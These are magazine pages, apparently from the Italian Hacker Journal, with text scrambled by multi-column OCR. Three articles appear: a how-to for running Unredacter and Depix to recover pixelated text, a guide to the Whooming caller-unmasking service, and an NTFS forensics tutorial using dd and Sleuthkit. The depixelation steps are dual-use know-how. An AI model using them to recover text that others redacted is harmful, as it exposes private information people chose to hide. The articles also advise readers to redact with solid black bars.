depixhmm) che si svincola
da alcuni dei limiti criticati
in Depix migliorando l’accuratezza
nella ricostruzione dei testi,
facendo registrare un concreto
passo in avanti a queste tecniche
di cracking.
LA CRITICA E LA SFIDA!
Ad agosto 2021, un ricercatore
di Jumpsec Labs, Caleb Herbert,
ha messo a dura prova Depix
in diversi scenari reali, giungendo
alla conclusione che si tratta
ancora di un tool a basso rischio
per la sicurezza. La ragione di
questa conclusione è che, per
risultare efficace, Depix richiede
PIXELLING
requisiti troppo stringenti. È solo il testo offuscato per sperare
nelle condizioni ideali previste dai che Depix riesca a deoffuscarli
sample dimostrativi (disponibili correttamente. Inoltre, se la scala
nel repository GitHub di Depix) o l’offset della pixellatura o la
che si ottengono risultati dimensione della casella è diversa
sbalorditivi, mentre risulta del da quella attesa, Depix non
tutto deludente su campioni che è in grado di restituire nulla.
introducono piccole variazioni e/o Allo stesso modo, se la pixellatura
rumori che in un contesto reale è stata eseguita con tool diversi
sono, però, da ritenersi del tutto da quelli supportati (basati su
normali. È necessario, infatti, algoritmi linear box filter),
conoscere a priori, o indovinare Depix non funziona. Sebbene
arbitrariamente, quali strumenti Jumpsec Labs ammetta che un
siano stati utilizzati per creare malintenzionato armato di Depix
Per gli amanti del “fai da te”
Se volete mettere alla prova Unredacter con un testo diverso da quello
di default, potete digitarlo direttamente nel campo Make Your Own
Redacted Text e premere Redact Me. Così facendo verrà generata
una nuova immagine pixellata già ottimizzata con i parametri richiesti
da Unredacter per ottenere un risultato ottimale. Non resta che cliccare
il pulsante Click To Start per avviare la procedura di deoffuscamento.
IMMAGINE PERSONALE
Per deoffuscare il testo di una vostra immagine dovete prima aprirla in
GIMP, croppare la porzione pixellata accertandovi che nel ritaglio non siano
presenti bordi di finestre, elementi grafici o altri testi, ed esportarla in
formato PNG nella directory unredacter-main sovrascrivendo il file secret.
png in essa presente. Se avete creato la pixellatura con l’Effetto pixel
di GIMP (richiamabile dal menu Filtri/Sfocature), prendete nota del valore
relativo alla dimensione del blocco di pixel scelto (in termini di Larghezza
blocco e Altezza blocco) e riportatelo nella riga const blockSize nel codice
dello script modificando opportunamente il file main.ts che si trova
in C:\unredacter-main\src. La fase più critica per una corretta riuscita del
deoffuscamento consiste nell’individuare esattamente il tipo di carattere
utilizzato nell’immagine per replicarlo
quanto più fedelmente possibile
nel file CSS del tool (index.css).
Per aiutarsi in questa fase è possibile
inserire una porzione del testo
in chiaro nel file test.html
e visualizzarlo in Chrome,
modificandolo (prestando
attenzione alla spaziatura tra parole
e lettere, alla dimensione e allo stile
del carattere) finché il font non sia
il più esatto possibile. Aprendo con
un editor di testo il file preload.ts,
che si trova in C:\unredacter-
main\src, e agendo alla riga
const guessable_characters,
è possibile determinare il set
di caratteri da usare.
 HOW TO
possa, con tanta fortuna, riuscire informazioni offuscate sul Web stringa di caratteri pubblicata in
a decifrare un testo offuscato, o nei video di YouTube. Sicuro fondo al suo articolo (https://bit.ly/
ritiene che sia ancora lontana di ciò, Caleb Herbert ha lanciato candepix), relativo alla prova
l’ipotesi di far correre ai ripari pubblicamente una sfida agli sul campo di Depix.
tutti coloro che negli anni hanno studiosi di tutto il mondo,
condiviso immagini con invitandoli a deoffuscare una UN POC DA PAURA
Il guanto di sfida lanciato da
figura #3 Herbert è stato raccolto da Dan
Petro, ricercatore capo presso
Bishop Fox, che nel febbraio 2022
non solo ha vinto la challenge
mostrando in chiaro il testo
offuscato di Jumpsec Labs (https://
bit.ly/neverusepix), ma che ha
Creando con un editor di testi una sequenza di De Bruijn (https://en. pubblicato su GitHub anche il
wikipedia.org/wiki/De_Bruijn_sequence) contenente tutte codice sorgente di Unredacter
le combinazioni previste di due caratteri, come mostrato in figura, (https://bit.ly/unredacter). Petro
e catturandone uno screenshot, è possibile usarlo in Depix come
è partito dall’ipotesi che in uno
immagine di ricerca di blocchi simili nel testo pixellato.
scenario reale l’attaccante sia
figura #4 in qualche modo a conoscenza
del tipo di font utilizzato e della
dimensione del corpo del
carattere. È plausibile pensare,
infatti, che lo stesso sia in
possesso di uno screenshot di cui
solo alcune porzioni del testo
Il ritaglio della porzione di immagine pixellata è fondamentale per siano state pixellate per celare
un corretto deoffuscamento. Nella guida di DepixHMM viene indicato informazioni sensibili. Analizzando
il bordo verde (che lascia una fila di pixel in alto e due in basso) come quindi l’intero documento e il
crop corretto da eseguire. Questo sebbene sia più intuitivo ritagliare contesto di un’immagine è logico
lungo il bordo rosso mostrato nell’immagine di esempio, a causa della
pensare che sia possibile
dimensione del carattere e all’offset y della pixellatura.
determinare non soltanto il font,
figura #5 ma anche la sua dimensione.
Sulla scorta di ciò, Petro si è
concentrato sull’implementare
delle soluzioni in grado di gestire
le criticità riscontrate in Depix (del
cui algoritmo sposa comunque la
logica di fondo) per risultare più
efficace. Tra questi vi è il bleed-
over dei caratteri (ossia la
condivisione della stessa griglia
di pixel da parte di due caratteri
contigui), la spaziatura (bianca) tra
gli stessi, la larghezza dei caratteri
Se volete dormire sonni tranquilli, ricordatevi di “distruggere” tutte dei font (ossia lo spazio
le informazioni che volete cancellare. In GIMP, per esempio, potete orizzontale occupato da ciascuna
usare lo Strumento pennello e il colore nero per piazzare una bella lettera, che varia nei casi in cui il
banda di omissis sui testi. font non sia di tipo monospace),

 46
 PIXELLING
l’incoerenza dovuta ai diversi Unredacter:
motori di rendering (che tendono come craccare i testi pixellati
a mostrare output leggermente
diversi anche se il font utilizzato #1
è il medesimo) e lo scostamento
della pixellatura (ossia le
coordinate di offset x e y che
determinano la posizione
del testo all’interno della griglia).
Per ripristinare un testo,
Unredacter utilizza sempre il
metodo di selezione inversa: parte
dall’immagine originale pixellata
e la confronta con una variante Procuratevi il pacchetto
sintetizzata enumerando coppie Dal sito https://bit.ly/unredacter cliccate sul pulsante verde Code
e poi sul link Download ZIP per scaricare l’ultimo commit disponibile
di caratteri pixellati, ma con diversi
di Unredacter. Infine, estraete il file unredacter-main in un percorso
spostamenti e caratteristiche. facile da raggiungere (per esempio nella root C:\).
Durante la procedura di
enumerazione, quindi, Unredacter
#2
seleziona gradualmente la
variante che più si avvicina al
frammento originale. A differenza
di Depix, infatti, non ha bisogno
di trovare una corrispondenza
esatta, ma accetta ipotesi che
siano “per lo più” giuste.
Risultando più raffinato ed
efficace di Depix (che di fatto
è una via di mezzo tra un cracking Installate le dipendenze
Per funzionare, Unredacter ha bisogno di installare alcune
brute force e un attacco
dipendenze tramite il Node Package Manager. Pertanto, dal sito
“a dizionario”), l’algoritmo https://nodejs.org/it/ scaricate e installate la versione consigliata di
implementato in Unredacter Node.js. Avviate il prompt (cmd), portatevi nella directory del tool
dimostra che il rischio di sicurezza (C:\unredacter-main) e digitate il comando npm install.
legato al deoffuscamento della
pixellatura (et similia) è in realtà #3
ben più alto di quello che si possa
immaginare. Per questa ragione,
da oggi in poi, se dovete oscurare
porzioni di testo in un’immagine,
usate soltanto metodi distruttivi
dei pixel. Come?
Con il vostro software di
fotoritocco preferito tracciate una
bella banda nera direttamente
Ora potete usare il tool!
sulle informazioni da nascondere; Scaricati tutti i pacchetti delle dipendenze, impartite il comando
e se usate i livelli, ricordatevi alla npm start. Dopo qualche secondo verrà caricata la schermata
fine di salvare il file in un formato di Unredacter. Per mettere subito alla prova il tool con l’immagine
che non li supporti (non PSD e TIFF pixellata di esempio secret.png (presente in unredacter-main),
premete Click to Start e… attendete pazientemente.
ma JPEG, PNG ecc.).

47 
 HOW TO

COME
RENDERE
VISIBILE
UN NUMERO
PRIVATO!
C’è un modo gratuito per “smascherare” chi effettua telefonate
usando il prefisso #31# per non farti vedere il suo numero

R
IN BREVE 
Ecco come funziona il
servizio che vi permette
di individuare il numero
della persona che vi
chiama con l’anonimo.
DIFFICOLTÀ
icevere telefonate da un
numero privato e anonimo
è un qualcosa di molto
fastidioso. Se poi tali chiamate
iniziano a diventare insistenti
e arrivano a qualsiasi ora del giorno
e della notte la storia inizia a diventare
seccante e preoccupante. Può capitare
che dietro a una telefonata anonima
ricevuta si nasconda un vostro amico
che ha intenzione di combinarvi solo
uno scherzo. Se avete intenzione
di “sgamarlo” potete utilizzare
un’applicazione mobile che consente
di “smascherare” il furbetto in vena
di prendervi in giro. Vi ricordiamo che
per effettuare chiamate anonime non
servono operazioni complicate da fare.
Tutti gli operatori, infatti, consentono
di poter effettuare telefonate

Alternative a Whooming
• L’app TrueCaller fornisce un servizio che fa della condivisione il suo punto di forza. In pratica, promette di risolvere
il problema verso le chiamate provenienti da numeri privati (non anonimi, ndr) mediante una sorta di registro creato
dagli utenti. È chiaro, quindi, che per funzionare, necessita della condivisione del proprio numero di cellulare
e dell’intera nostra rubrica. Noi della redazione sconsigliamo la condivisione di tutte queste informazioni con i server
di TrueCaller, nonostante il servizio sia utile e funzioni molto bene.
Web: https://www.truecaller.com/

• Should I Answer? è un’altra app in grado di identificare (e bloccare) le chiamate che provengono da numeri
di telefono di operatori di telemarketing che sono inseriti in un database che viene aggiornato ogni giorno tramite
le segnalazioni degli utenti. Al contrario di TrueCaller, Should I Answer? non necessita della condivisione del proprio
numero di telefono, quindi si può dire che rispetta la nostra privacy, ma ovviamente non sortisce gli stessi risultati.
Web: https://www.shouldianswer.com/

 48
 SCOCCIATORI
Registro delle opposizioni Abbonarsi
Per proteggersi dal “telemarketing selvaggio” potete iscrivervi al servizio:
vantaggi
gratuitamente al registro delle opposizioni (www.registrodelleopposizioni.
it). L’iscrizione può essere richiesta da tutti i possessori di una linea
telefonica fissa, la cui utenza risulti inserita negli elenchi telefonici
pubblici. Inoltre, a partire dal 27 luglio di quest’anno, il registro delle
opposizioni sarà attivo anche per i numeri di cellulare. e costi!
Whooming funziona in modo
totalmente gratuito: per i primi
nascondendo il proprio numero. non è obbligatoria l’installazione sette giorni dalla registrazione
Come? Banalmente inserendo un dell’applicazione sul telefono, è incluso l’abbonamento
Premium con il quale potete
codice davanti al numero che si ma basta solo configurare la
vedere immediatamente i numeri
vuole contattare: #31#. Questo deviazione di chiamata, possibilità anonimi che vi contattano, sia
escamotage funziona con tutti offerta da qualunque operatore dando l’occupato alla telefonata
gli operatori di telefonia mobile, mobile e poi, successivamente, e sia se arrivano le chiamate
durante un’altra conversazione.
mentre da rete fissa il codice scorrere la lista delle chiamate
Le opzioni per un abbonamento
da usare è *67#. accedendo al servizio su Internet. invece sono: 3 mesi 11,99 euro;
6 mesi 17,99 euro; un anno
LO SCOVA NUMERI TECNICA DELL’INOLTRO 23,99 euro. Gli abbonamenti
In questa guida vi presentiamo il Il servizio offerto da Whooming contemplano anche delle opzioni
in più rispetto alla versione
servizio Whooming (https://bit.ly/ funziona tramite la cosiddetta
gratuita. In particolare
whoomingfull) che consente tecnica dell’inoltro di chiamata: avrete la possibilità di:
di risolvere il “problema” delle in sostanza tutte le telefonate • far sentire la linea libera ai
chiamate anonime. Tramite la sua rifiutate verranno inoltrate verso mittenti delle chiamate anonime
mentre il sistema avrà già messo
applicazione, disponibile sia per un numero che ci viene assegnato
in chiaro il numero;
dispositivi Android che iOS, avrete direttamente dal servizio; basterà • avviare la registrazione delle
la possibilità di individuare senza poi aprire la lista dall’applicazione conversazioni intercettate;
troppe difficoltà l’identità di chi vi o dal sito Internet di Whooming • avviare il download delle
sta contattando in modo anonimo. e vedere chi vi sta chiamando. registrazioni sul vostro computer;
• inviare notifiche SMS per
Funziona sia sulla linea del La versione base è gratuita ricevere un messaggio con
cellulare (con tutti gli operatori), e, per i primi sette giorni, si ha il numero di chi ha chiamato.
che sulla linea fissa. Uno dei suoi l’abbonamento Premium incluso.
punti di forza è la compatibilità Con questo pacchetto si possono
con tutti i tipi di linea mobile: vedere subito i numeri che ci
il servizio in pratica funziona stanno contattando.
con tutti i cellulari e non solo Trascorso il periodo di prova
con gli smartphone di ultima di sette giorni, si dovrà aspettare
generazione. È sfruttabile, in altre ventiquattro ore dalla telefonata
parole, anche con i classici cellulari per poter visualizzare il numero
privi di connessione a Internet. con le ultime quattro cifre coperte
Per poter usare Whooming, infatti, da asterischi.

Chiamare con numero privato

è molto facile... ma lo è anche
sgamare chi lo fa grazie a Whooming
 HOW TO
Preparate la trappola per chi ci chiama
PASSO 1
Scaricate l’applicazione
Whooming dal Play Store
(è disponibile anche per iOS).
Dopo averla installata vi
verrà richiesto di effettuare
l’accesso tramite una
semplice registrazione.
Si può fare tramite email,
Google o Facebook. Optate
per la nuova iscrizione:
la procedura è molto
semplice e l’app vi segue in
tutta l’operazione. Tappate
sul pulsante Iscriviti.
PASSO 3
Adesso dovete impostare
la deviazione di chiamata:
basta premere sul tasto
verde ed effettuare la
chiamata al numero che
appare sul display. Dopo
aver attivato la deviazione
di chiamata, che verrà
confermata con un
messaggino, tornate
nell’app e cliccate OK sono
Pronto.
PASSO 5
D’ora in poi vi basterà
rifiutare le chiamate
provenienti da numeri
sconosciuti per vederle
subito in chiaro nella
schermata Registro
Chiamate di Whooming.
Ricordatevi che per i primi
sette giorni il servizio
è gratuito e che, poi, con
la versione base dovranno
passare 24 ore prima
di poter visualizzare
il risultato.
 50
PASSO 2
Confermate la registrazione
al servizio riportando
nell’apposito campo il codice
che vi è stato inviato
all’indirizzo email utilizzato
per la registrazione; tappate
su Verifica. A questo punto
dovete inserire il paese,
l’operatore della vostra linea
e il numero di cellulare
sul quale si vuole attivare
il servizio.
PASSO 4
A questo punto,
l’applicazione vi farà
effettuare una prova
utilizzando il vostro numero.
Dopo aver effettuato
la telefonata di prova
vi apparirà la schermata
in cui viene confermata
l’attivazione del servizio
Whooming. Premete adesso
il tasto Vai a lista chiamate
e concedete l’accesso
ai vostri contatti.
PASSO 6
Se non volete più utilizzare
il servizio offerto da
Whooming sarà sufficiente
digitare ##002# sul
tastierino numerico del
vostro telefono e inoltrare
la chiamata. Al termine di
questa operazione apparirà
un messaggio sullo schermo
che vi darà conferma
della disattivazione
del servizio. Finito!
 ABBONATI
ALLA TUA RIVISTA PREFERITA
TE LA SPEDIAMO APPENA STAMPATA!

CONSEGNA GARANTITA ENTRO 48H

Con l’abbonamento
cartaceo la versione
digitale è in OMAGGIO!

Riceverai 12 numeri a soli

DISPONIBILE ANCHE SOLO
IN VERSIONE DIGITALE

-28% -57%
CARTACEO DIGITALE
12 numeri 12 numeri
solo 33,90€ solo 19,90€
invece di 46,80€ invece di 46,80€

Scansiona il QrCode per abbonarti oppure contattaci

Telefono online email WhatsApp
02 87168197 www.sprea.it/hackerjournal [email protected]

329 3922420
Solo messaggi
Informativa ex Art.13 LGS 196/2003. I suoi dati saranno trattati da Sprea SpA, nonché dalle società con essa in rapporto di controllo e collegamento ai sensi dell’art. 2359 c.c. titolari del trattamento, per dare corso alla sua richiesta di abbonamento. A tale scopo, è indispensabile il conferimento dei dati anagrafici. Inoltre
previo suo consenso i suoi dati potranno essere trattati dalle Titolari per le seguenti finalità: 1) Finalità di indagini di mercato e analisi di tipo statistico anche al fine di migliorare la qualità dei servizi erogati, marketing, attività promozionali, offerte commerciali anche nell’interesse di terzi. 2) Finalità connesse alla comunica-
zione dei suoi dati personali a soggetti operanti nei settori editoriale, largo consumo e distribuzione, vendita a distanza, arredamento, telecomunicazioni, farmaceutico, finanziario, assicurativo, automobilistico e ad enti pubblici ed Onlus, per propri utilizzi aventi le medesime finalità di cui al suddetto punto 1) e 2). Per tutte
le finalità menzionate è necessario il suo esplicito consenso. Responsabile del trattamento è Sprea SpA via Torino 51 20063 Cernusco SN (MI). I suoi dati saranno resi disponibili alle seguenti categorie di incaricati che li tratteranno per i suddetti fini: addetti al customer service, addetti alle attività di marketing, addetti al
confezionamento. L’elenco aggiornato delle società del gruppo Sprea SpA, delle altre aziende a cui saranno comunicati i suoi dati e dei responsabili potrà in qualsiasi momento essere richiesto al numero +39 0287168197 “Customer Service”. Lei può in ogni momento e gratuitamente esercitare i diritti previsti dall’articolo 7
del D.Lgs.196/03 – e cioè conoscere quali dei suoi dati vengono trattati, farli integrare, modificare o cancellare per violazione di legge, o opporsi al loro trattamento – scrivendo a Sprea SpA via Torino 51 20063 Cernusco SN (MI).
 HOW TO
Alla scoperta di NTFS!
TERZA PA
RT E
Vediamo come il filesystem NTFS,
tipico dei sistemi Windows, conserva i file
N
IN BREVE  elle precedenti puntate
abbiamo imparato a
Studiamo a fondo
conoscere il filesystem di
le caratteristiche
di uno dei filesystem
Windows, NTFS (New
più diffusi. Technology File System), che ormai
sappiamo essere diviso in tre grandi
DIFFICOLTÀ
macroaree visibili in [figura #1] e
spiegate nel box La struttura di NTFS.
NTFS & TOOL
La larghissima diffusione di NTFS e la
sua versatilità hanno favorito la nascita
di tantissimi tool specialistici: nelle
scorse puntate abbiamo visto alcuni
di quelli più rappresentativi, ciascuno
dotato di specifiche caratteristiche
in grado di distinguerlo dagli altri.
Stiamo parlando di software come:
• NTFStool, che abbiamo utilizzato per
esaminare in tempo reale, dal prompt
dei comandi, i contenuti dei file record
di partizioni NTFS;
figura #1
L’homepage di Cygwin, www.cygwin.com
 52
• Kape, per l’estrazione della MFT
di dischi formattati con NTFS,
propedeutica alla successiva analisi
da parte di tool “post mortem”;
• MFTexplorer che, pur richiedendo (al
contrario di NTFStool) la propedeutica
estrazione della MFT della partizione
da analizzare, ne consente l’esame
in formato grafico, con un’apposita
GUI in grado semplificare l’analisi
da parte dell’utente.
Usando questi strumenti, siamo riusciti
ad addentrarci nell’analisi della Master
File Table e dei file record relativi ai
principali metafile del filesystem.
Ma come viene memorizzato, invece,
un file “ordinario”?
ESAMINARE I FILE
La risposta, per quanto banale, è:
nello stesso modo. A seconda delle
dimensioni, tuttavia, i dati del file
potrebbero essere immagazzinati (al
contrario di quanto visto per i metafile
di NTFS) interamente all’interno del
relativo file record. Per osservare più
da vicino questo comportamento,
abbiamo bisogno innanzitutto di
estrarre un’immagine bit a bit della
partizione su cui intendiamo lavorare.
Riprendiamo allora la nostra fidata
(e datata) chiavetta USB da 1 GB,
formattiamola con NTFS (per “pulire”
le strutture del filesystem) e inseriamo
al suo interno tre file di testo
semplicissimi:
• il primo, che chiameremo
filesystem.txt, contenente la stringa
“Lezione su NTFS”;
• il secondo, da nominare hj.txt,
 FILESYSTEM
La schermata dell’installer di
Cygwin per la selezione delle
caratteristiche della nostra
connessione a Internet.

La struttura figura #2
di NTFS
Ecco le tre macroaree che
compongono la struttura
del filesystem NTFS:
• boot sector, l’area iniziale
del disco/partizione, ove sono
conservate le informazioni
di base sul filesystem (tra cui la
dimensione dei cluster, concetto
che può essere approfondito
nel box Settori e cluster), i dati
necessari per il bootstrap (ovvero
il caricamento del sistema
operativo) e quelli per l’accesso
a tutte le strutture utilizzate
per la gestione del filesystem;
• la Master File Table (MFT),
la struttura principale di NTFS
(a cui non a caso è dedicato il box
di approfondimento omonimo), figura #3
che possiamo immaginare come
un’enorme tabella in cui, per
ciascun file della partizione,
è presente un elemento (detto
MFT entry o file record)
contenente tutte le relative
informazioni, come dimensione,
flag, directory di appartenenza
e il relativo contenuto (o quanto
meno l’indirizzo dei cluster ove
tale contenuto è memorizzato);
• l’area dati, che ospita
concretamente i file residenti
nella partizione.

La schermata dell’installer di
Cygwin per la selezione del
mirror da cui scaricare i vari
programmi che utilizzerete.

contenente la frase: “File filesystem pulito ed elementare: a bit del nostro filesystem, da
di esempio Hacker Journal”; insomma, un ottimo banco di test “dare in pasto” successivamente al
• nel terzo, dd.txt, inseriamo per i nostri esperimenti! tool per l’analisi. Sebbene sia tipico
il manuale di dd (uno dei tool che dei sistemi GNU/Linux, è possibile
introdurremo in questa puntata), CYGWIN accedervi anche in ambiente
che possiamo reperire al link Il software di cui abbiamo copiato Windows, grazie alla suite Cygwin.
https://ss64.com/bash/dd.html. il manuale, dd, è quello che ci Per chi non la conoscesse, Cygwin
In questo modo, disponiamo di un consentirà di estrarre una copia bit può essere vista come una

53 
 HOW TO
L’estrazione dell’immagine bit a bit della chiavetta USB,
mediante il tool dd incluso in Cygwin.
collezione di tool in grado di
fornire ai sistemi Microsoft
funzionalità comparabili a quelle
di una qualsiasi distro GNU/Linux.
Possiamo scaricare l’ultima
versione di Cygwin dal sito Web
del progetto (www.cygwin.com),
selezionando il link setup-x86_64.
exe [figura #1]. Non vi stupite
se il download procede “troppo”
rapidamente: si tratta solo
del pacchetto iniziale, mentre
i software veri e propri saranno
scaricati soltanto nel corso
dell’installazione. Una volta
completato il download:
• avviamo l’installer con un doppio
click e forniamo le nostre
autorizzazioni amministrative;
• accettiamo le scelte di default
proposte, a eccezione
di quelle per la selezione della
tipologia di connessione (nella
stragrande maggioranza dei casi
è sufficiente optare per direct
connection – [figura #2])
e del mirror da utilizzare
per il download [figura #3].
L’homepage di Sleuthkit,
www.sleuthkit.org
 54
figura #4
figura #5
ESTRARRE L’IMMAGINE
Al termine dell’installazione,
possiamo avviare Cygwin cliccando
sulla relativa icona presente sul
desktop. Inseriamo la nostra
chiavetta USB nel PC, annotiamo
la lettera che Windows assegnerà
al relativo drive, quindi
visualizziamo l’elenco dei dischi
presenti nel sistema,
con il comando
$ cat /proc/partitions
Come possiamo notare, l’output
di questo comando riporta,
L’elenco, fornito da Cygwin,
delle partizioni accessibili
dal sistema operativo.
accanto al nome di ciascuna
partizione a noi accessibile
[figura #4], sia il punto di mount
di Windows (ovvero la lettera
associata alla partizione),
sia il nome del corrispondente
device da utilizzare in Cygwin.
Nel nostro caso, alla chiavetta USB
è possibile accedere mediante la
lettera E:\ (se utilizziamo il sistema
operativo sottostante) oppure
attraverso il file di device /etc/
sdb1: è questo il file da tenere
a mente per estrarre l’immagine
del supporto di memoria,
operazione che richiede la sintassi
$ dd if=/dev/sdb1
of=chiavetta.dd bs=1024
Una volta avviato questo
comando, il già citato tool dd
effettuerà una copia bit a bit
della nostra chiavetta,
salvando l’immagine creata nel file
chiavetta.dd [figura #5].
SLEUTHKIT
Finalmente disponiamo di
un’immagine della nostra chiavetta
USB: e adesso? Il prossimo step
figura #6
 FILESYSTEM
figura #7 da utilizzare è fsstat: è sufficiente
digitare dal prompt la stringa
seguente

> fsstat.exe chiavetta.dd

è rappresentato dall’installazione
di The Sleuthkit (TSK), una suite
per l’analisi forense dei filesystem.
Con una storia ventennale alle
spalle, Sleuthkit si è ritagliato nel
tempo uno spazio di rilievo nel
settore, sino ad affermarsi come
uno dei prodotti di riferimento
nel campo dell’analisi forense,
grazie anche alla varietà
dei filesystem analizzabili (non
solo NTFS ma anche, tra gli altri,
le varie versioni di EXT
– il filesystem più utilizzato
in ambiente GNU/Linux –
FAT, ExFAT, ISO 9660) e dei sistemi
operativi supportati (oltre
a Windows, TSK è installabile
anche nei sistemi GNU/Linux,
macOS X, Open & FreeBSD,
Solaris). Non ultimo, i tool di cui
si compone la suite – nonché il
framework stesso – sono Software
Libero, rilasciati sotto le licenze
“IBM Public License” e “Common
Public License”: sono scaricabili
gratuitamente dal sito del progetto
(www.sleuthkit.org, [figura #6])
La pagina per
il download
di Sleuthkit. per ottenere una panoramica
abbastanza completa delle
caratteristiche del filesystem.
e, soprattutto, liberamente Come possiamo notare in [figura
impiegabili. Una volta effettuato #8], l’output del comando riporta
il download dei binari più recenti tre tipologie di informazioni,
disponibili per Windows suddivise in altrettante sezioni:
[figura #7], non ci resta che • informazioni di carattere
decomprimere il pacchetto per generale (sezione FILE SYSTEM
avere già pronti all’uso tutti i tool INFORMATION), come il seriale
della suite, comodamente raccolti del volume o il nome OEM
nella sottodirectory bin. (che, per i supporti formattati
in ambiente Windows, assume
UN ESAME VELOCE di norma il valore “NTFS”);
Anche se il nostro scopo in questa • informazioni sulla Master File
sede è analizzare
i file contenuti
nell’immagine,
figura #8
non possiamo Il comando
esimerci da uno fsstat mostra
i dati salienti
sguardo veloce alle
del filesystem.
caratteristiche
del filesystem,
anche nell’ottica
di una comparazione
completa dei tool
(e delle relative
feature) presentati
in queste puntate.
Nel caso di The
Sleuthkit, il comando

SETTORI E CLUSTER
P er gestire la memorizzazione delle
informazioni, i byte di cui è composto un
disco sono suddivisi in settori, aree logiche
dalla dimensione omogenea. I settori, a loro
volta, vengono raggruppati in cluster, in una
proporzione variabile – entro i parametri
previsti dalle specifiche del filesystem – stabilita
all’atto della formattazione.
Il cluster costituisce l’unità minima di
allocazione: indipendentemente dalla sua reale
dimensione (fosse anche un singolo byte!),
ogni file occupa almeno un cluster su disco
(ed ecco la disparità che a volte si può notare
smanettando con le proprietà di dischi, file
e directory, tra le dimensioni reali del file
e le dimensioni occupate su disco!).

55 
 HOW TO
Table (sezione METADATA
INFORMATION), tra cui il relativo
cluster di allocazione (nonché
quello della sua copia, $MFTMirr),
la dimensione di ogni file record
(struttura che Sleuthkit denomina
“MFT Entry”), il file record della
root directory del filesystem;
• informazioni sui contenuti veri
e propri del filesystem (sezione
CONTENT INFO), come le
dimensioni (e il numero) di settori
e di cluster e le caratteristiche
degli attributi definiti all’interno
del filesystem.
MFT & FILE
Contrariamente a quanto abbiamo
visto con i tool trattati
in precedenza, i dati mostrati
da fsstat non derivano
dall’interrogazione della
Master File Table, quanto
piuttosto dal boot sector.
Per accedere alla MFT – e ai dati
ivi memorizzati – Sleuthkit
ci mette a disposizione
altri comandi, a iniziare
da fls. Digitando
> fls.exe -r chiavetta.dd
possiamo visualizzare l’elenco
dei file contenuti nell’immagine
[figura #9], che Sleuthkit
si preoccupa di ricavare,
in maniera del tutto trasparente
all’utente, da un’apposita
interrogazione della MFT:
il programma si limita
a scandire tutti i file record
presenti nella MFT, stampando
a video – per quelli che risultano
in uso – il nome del file a cui l’entry
fa riferimento, nonché il relativo
indice numerico all’interno
della tabella. A tal proposito,
i lettori più attenti potrebbero
aver notato un’apparente

Master File Table

contraddizione. Come abbiamo
avuto modo di spiegare (e “toccare
con mano”) nelle precedenti
Gran parte del design di NTFS può essere sintetizzato con due concetti:
la Master File Table e l’assunto che “ogni oggetto è un file”. puntate, gli indici dei file record
Che si tratti del boot sector, della root directory o dei metadati deputati sono semplici valori numerici
alla gestione del filesystem (compresa la stessa Master File Table), che ne stabiliscono la posizione
tutto viene rappresentato da NTFS sotto forma di file. all’interno della MFT, misurandola
Possiamo pensare alla MFT come una gigantesca tabella, che associa
in termini di offset dal primo
a ciascun file presente nel filesystem un elemento detto MFT entry o file
record. Ogni file record è identificato univocamente da un apposito indice, elemento (indice 0 per la prima
che ne specifica la posizione all’interno della tabella: entry, 1 per la seconda, 2 per la
• il primo file record ha indice pari a 0, e contiene gli attributi relativi terza e così via): ma allora perché
al file $MFT, che identifica la MFT stessa;
fls riporta questi stessi indici
• il secondo (indice 1) fa riferimento al file $MFTMirr,
ovvero la copia della MFT; in un formato x-y-z, formato da tre
• il sesto (indice 5) rappresenta la root directory del filesystem (.), interi piuttosto che da uno?
l’ottavo il boot record ($Boot), mentre gli elementi dall’indice 27
in poi sono generalmente associati a file ordinari; INFORMAZIONI SUI FILE
Inoltre la MFT ha una struttura composta da due grandi aree:
La risposta sta nelle peculiarità
• un header iniziale, contenente informazioni di carattere generale,
come la dimensione effettiva e allocata su disco o il numero di sequenza di NTFS che, come vedremo
(che indica il numero di riutilizzi del file record, incrementandosi ogni nelle prossime puntate, consente
volta che il file associato viene cancellato e ricreato); di associare più flussi di dati
• una lista di attributi, il cui contenuto varia da attributo ad attributo. a un singolo file: può quindi
Sono proprio gli attributi a definire il file: in NTFS, infatti, un file non
è altro che un insieme di attributi. Tra questi, è opportuno segnalare: capitare che in una entry MFT
• $DATA, l’attributo a cui è affidato il compito di conservare il contenuto siano presenti più istanze
del file. Generalmente è un attributo non residente, ovvero esterno dell’attributo $DATA (fate
al file record che si limita a conservare l’indirizzo dei cluster ove l’attributo
riferimento al box Master File
è effettivamente memorizzato;
Table se vi dovesse servire
• $STANDARD_INFORMATION, l’attributo (residente, ovvero interno al file
record) che memorizza le informazioni temporali (come tempi di creazione, un veloce riepilogo sugli
modifica e accesso) e i flag (quelli relativi, ad esempio, ai file di sistema, attributi NTFS). Per poter
read only, nascosti o compressi) di ciascun file e directory del volume; accedere a ciascun flusso
• $FILE_NAME (anch’esso residente), che viene utilizzato per di dati, i tool di Sleuthkit
la memorizzazione di nome e dimensione dei file (quest’ultima distinta
in dimensione reale e dimensione allocata) e per i riferimenti alla richiedono che sia utilizzato
directory di appartenenza. un indice del tipo x-y-z, in cui:

 56

figura #9
figura #10
Il comando istat mostra i dati salienti
di un file, individuato mediante l’indice
del relativo file record.
• x coincide con l’indice numerico
del file record (un intero);
• y-z è una coppia di interi che
rappresenta il codice numerico
associato all’attributo $DATA.
Per esempio, tornando all’output
di fls in [figura #9], l’indice 64-128- Insomma, grazie ai tool visti sinora file cancellati. Ma questa è un’altra
2 è relativo al file dd.txt, mentre
l’indice 73-128-2 identifica il file
hj.txt. Qualora – come nei casi
citati – il file sia privo di flussi di
dati multipli, è tuttavia possibile
accedervi indicando unicamente
l’indice numerico del file record di
riferimento, proprio come visto
per i tool trattati nelle precedenti
FILESYSTEM
Il comando fls proprio come se ci muovessimo
mostra, con
l’opzione -r, tutti
all’interno del filesystem vero
e proprio, piuttosto che
i file contenuti
nell’immagine.
analizzarne una “semplice”
immagine. Non ci resta che un
ultimo step: poter visualizzare
puntate. Per anche il contenuto del file,
esempio, per operazione che, per quanto possa
ottenere le sembrare strano, non abbiamo
informazioni salienti ancora visto nelle precedenti
sul file hj.txt puntate. È sufficiente invocare
interrogando la il comando icat di Sleuthkit:
relativa entry MFT, è
sufficiente eseguire > icat chiavetta.dd 73
il comando
oppure, in maniera equivalente
> istat
chiavetta.dd 73 > icat chiavetta.dd 73-128-2
in grado di fornire per visualizzare i contenuti del file
